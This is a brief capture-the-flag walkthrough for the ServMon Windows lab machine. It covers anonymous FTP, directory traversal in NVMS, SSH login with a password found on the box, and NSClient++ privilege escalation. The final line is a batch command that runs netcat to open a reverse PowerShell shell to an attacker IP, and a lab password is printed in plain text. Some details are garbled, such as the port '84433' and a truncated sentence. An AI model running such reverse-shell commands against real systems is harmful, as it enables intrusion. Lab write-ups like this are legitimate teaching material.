This time I am writing the solution for the ServMon box. A easy windows box. Let’s dive into the solution.
🔥 nmap to get the open ports.
The resutls…
First of all the one port I will look is ftp because I have anonymous access allowed. There is a directory named Users and inside that there are two directories Nadine and Nathan containing two files named Confidential.txt and Notes to do.txt respectively. It is a good thing at this time to keep notes about these two usernames.
The content of Confidential.txt:
I keep in back of my mind that there is file named Passwords.txt in Nathan Desktop folder.
And Notes to do.txt:
There are some incompleted todo’s such as remove public access to NVMS. Remember port 80? Let’s take a look into that.
So this validates the 4th todo. I try to login by using admin as username and password but nothing. At this point because I don’t have a password, I try to search about vulnerabilites.
I open burp, navigate to 10.10.10.184 intercept the request and then send it to repeater(ctrl+r).
And indeed this works. Now If you remember from Confidential.txt there is a file with passwords. I get that file.
After trying each of this password with ssh password L1k3B1gBut7s@W0rk worked.
We can get user flag now.
After searching the box for hints about root, I find nothing. Going back to nmap we can see a port open 84433 wiht ssl cert. Visiting the site brings up a NSClient++.
Searching with searchsploit turns out there is a privilege escalation.
First we need to get the password of the client from file c:\program files\nsclient++\nsclient.ini
But the password does not work. Giving us a 403.
Going back to the nsclient.ini file I see there is present a configuration which does not allow connections from
@echo off C:\Temp\nc.exe 10.10.14.52 9854 -e powershell